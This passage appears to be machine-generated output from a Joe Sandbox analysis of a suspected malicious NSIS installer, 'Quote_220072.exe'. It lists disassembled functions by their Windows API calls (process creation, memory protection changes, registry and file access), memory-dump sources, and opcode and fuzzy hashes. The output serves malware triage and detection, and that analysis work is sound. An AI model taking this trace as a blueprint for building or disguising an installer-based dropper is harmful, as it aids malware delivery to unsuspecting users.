                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$InitializeUninitialize
                                                                              • String ID: Varighedskravs Setup: Installing
                                                                              • API String ID: 1011633862-452364317
                                                                              • Opcode ID: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
                                                                              • Instruction ID: 8d413f420cbd2cda170a8e13f5886ccfc68e5e1a5fc2061566676394b2cd1e54
                                                                              • Opcode Fuzzy Hash: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
                                                                              • Instruction Fuzzy Hash: 97F09077800A008EE3416B54AD01B6777A4EBD1305F09C53EEE88A62A1DB794C628A5E
                                                                              APIs
                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00405E04
                                                                              • GetLastError.KERNEL32 ref: 00405E0E
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DFC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 1375471231-297319885
                                                                              • Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                                                              • Instruction ID: 1d45a01f7acee8fa23fe776dff3dd1d011af88d7d8ca29917c3c3e776444c4f1
                                                                              • Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                                                              • Instruction Fuzzy Hash: 74C012326000309BC7602B65AE08A87BE94EB506A13068239B988E2220DA308C54CAE8
                                                                              APIs
                                                                                • Part of subcall function 6FF82351: GlobalFree.KERNEL32(?), ref: 6FF82A44
                                                                                • Part of subcall function 6FF82351: GlobalFree.KERNEL32(?), ref: 6FF82A4A
                                                                                • Part of subcall function 6FF82351: GlobalFree.KERNEL32(?), ref: 6FF82A50
                                                                              • GlobalFree.KERNEL32(00000000), ref: 6FF81738
                                                                              • FreeLibrary.KERNEL32(?), ref: 6FF817C3
                                                                              • GlobalFree.KERNEL32(00000000), ref: 6FF817E9
                                                                                • Part of subcall function 6FF81FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 6FF81FFA
                                                                                • Part of subcall function 6FF817F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6FF81708,00000000), ref: 6FF8189A
                                                                                • Part of subcall function 6FF81F1E: wsprintfW.USER32 ref: 6FF81F51
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                                              • String ID:
                                                                              • API String ID: 3962662361-0
                                                                              • Opcode ID: 4ac4876d2ea26972018257c57ff5adb6bbec973041266ca69295e739676abd87
                                                                              • Instruction ID: c6dd1827c295a0579d783a89fe0c2cbc59a821cb11c1c30bda7c5a9ab590f1ed
                                                                              • Opcode Fuzzy Hash: 4ac4876d2ea26972018257c57ff5adb6bbec973041266ca69295e739676abd87
                                                                              • Instruction Fuzzy Hash: 4541A232404349AFDB209F68D944BDE37F8BF02325F00421EF97D9A296DB79B544C651
                                                                              APIs
                                                                              • MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                              • SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
                                                                              • Instruction ID: 15b31486c92c371a01b824ec8c308dd00c5fb3f6de234e3455dc008c55755f60
                                                                              • Opcode Fuzzy Hash: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
                                                                              • Instruction Fuzzy Hash: 2A01D472E542309BD7196F28AC09B2A2699A7C1711F15893EF901F72F1E6B89D01879C
                                                                              APIs
                                                                                • Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05
                                                                                • Part of subcall function 00406BA3: CharNextW.USER32(?,?,?,00000000,007A4288,0040662D,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 00406BB2
                                                                                • Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BB7
                                                                                • Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BD1
                                                                                • Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
                                                                                • Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                                • Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
                                                                                • Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC
                                                                              • lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 0040666A
                                                                              • GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B
                                                                                • Part of subcall function 004065AD: FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
                                                                                • Part of subcall function 004065AD: FindClose.KERNEL32(00000000), ref: 004065C4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                                                              • String ID:
                                                                              • API String ID: 1879705256-0
                                                                              • Opcode ID: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
                                                                              • Instruction ID: a0caebe489df7e9b8c47fc78556c087e467958ed1b806a88a2837ae242d5d264
                                                                              • Opcode Fuzzy Hash: 3b9d5aeb4753024ac2323fedf4887ec0200a7770af3d0f5eda4629e85134c37a
                                                                              • Instruction Fuzzy Hash: FAF0C2614042212AC72037751E88A2B255C8E4635971B4F3FFCA7F12D2CA7ECC31957D
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A3A40,?), ref: 004066DD
                                                                              • CloseHandle.KERNEL32(?), ref: 004066EA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateHandleProcess
                                                                              • String ID:
                                                                              • API String ID: 3712363035-0
                                                                              • Opcode ID: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
                                                                              • Instruction ID: 38b84478e037bba77e5bda8d52abba300c1c8c141792dec0b9fd1b8b871a7deb
                                                                              • Opcode Fuzzy Hash: 36c5eb473c901fdc976d11b5d23e54a470827d4f9f65b3378b18ae8ddc32ee08
                                                                              • Instruction Fuzzy Hash: 45E0BFF0600219BFFB009F64ED05E7BB66CFB44604F008529BD51E6150D77499149A79
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quote_220072.exe,80000000,00000003), ref: 004068FD
                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesCreate
                                                                              • String ID:
                                                                              • API String ID: 415043291-0
                                                                              • Opcode ID: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                                                              • Instruction ID: 2b20bdeb62c6161fa823f395ef17c7eb789f23499ed64d7ea8bf83f44df62fc9
                                                                              • Opcode Fuzzy Hash: 0b70b3aee83a9b3875abd98ff145d1d59e445032f30ecb3830cc7005a44e8a60
                                                                              • Instruction Fuzzy Hash: 3ED09E71118201AEDF054F20DE4AF1EBA65EF84710F114A2CF6A6D40F0DA718865AA15
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 6ad4e709d86c028406b87354e1aed307fb3f349c966afe3e4420958b6cf994ae
                                                                              • Instruction ID: d93e78494e09aa6ec4d7f3fdec31074403eedaf14b92a7a433c4b641b89fd750
                                                                              • Opcode Fuzzy Hash: 6ad4e709d86c028406b87354e1aed307fb3f349c966afe3e4420958b6cf994ae
                                                                              • Instruction Fuzzy Hash: C741A0769007059FDF009F68DA81BA93BB4EF07338F24422AE535CF3A0D735A4A18B94
                                                                              APIs
                                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00793200,00403326,?,00793200,?,00793200,?,?), ref: 00406A00
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                                                              • Instruction ID: af586fd2f7f6880044e5fe5766d6096d47c0719768b2310f5fb2dcc6f4abfd7b
                                                                              • Opcode Fuzzy Hash: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
                                                                              • Instruction Fuzzy Hash: 68E0BF32600119BB8F205B56DD04D9FBF6DEE927A07124026F906B6150D670EA51DAE4
                                                                              APIs
                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00000000,004031A2,?,00000004,00000000,00000000,00000000,00000000), ref: 0040693D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                                                              • Instruction ID: de6cc0abbc936f950c0aa48064430f9d9b1dfb465831d1c2e6fd43c94deb3c7e
                                                                              • Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
                                                                              • Instruction Fuzzy Hash: B7E0BF72200119BB8F215F46DD04D9FBF6DEE956A07114026B905A6150D670EA11D6E4
                                                                              APIs
                                                                              • VirtualProtect.KERNELBASE(6FF8501C,00000004,00000040,6FF85034), ref: 6FF81A68
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              • Opcode ID: 1bff8127119a0500e72edd0d0b85e0f4942515b0927be205f78e404a0c2cb49c
                                                                              • Instruction ID: f0236cd0b057474380caad8b95ea0e69724d72aa2d1926dc757d1853453af039
                                                                              • Opcode Fuzzy Hash: 1bff8127119a0500e72edd0d0b85e0f4942515b0927be205f78e404a0c2cb49c
                                                                              • Instruction Fuzzy Hash: 20F092B4979B42DBCF198F2C94447293FB0B71B374B08452EF27A9A360C3304121AB9E
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406983,?,?,?,?,Call,00000000,00000000), ref: 004062DA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Open
                                                                              • String ID:
                                                                              • API String ID: 71445658-0
                                                                              • Opcode ID: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                                                              • Instruction ID: 8275c49ac47c74d38988e0f8258bf7c149b7cc7998a497f72a9ef83b4f38b8ad
                                                                              • Opcode Fuzzy Hash: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
                                                                              • Instruction Fuzzy Hash: 51D0123204020DBBDF11AF90DD01FAB372DAB08750F01443AFE16A40A0D775D531A718
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                              Memory Dump Source
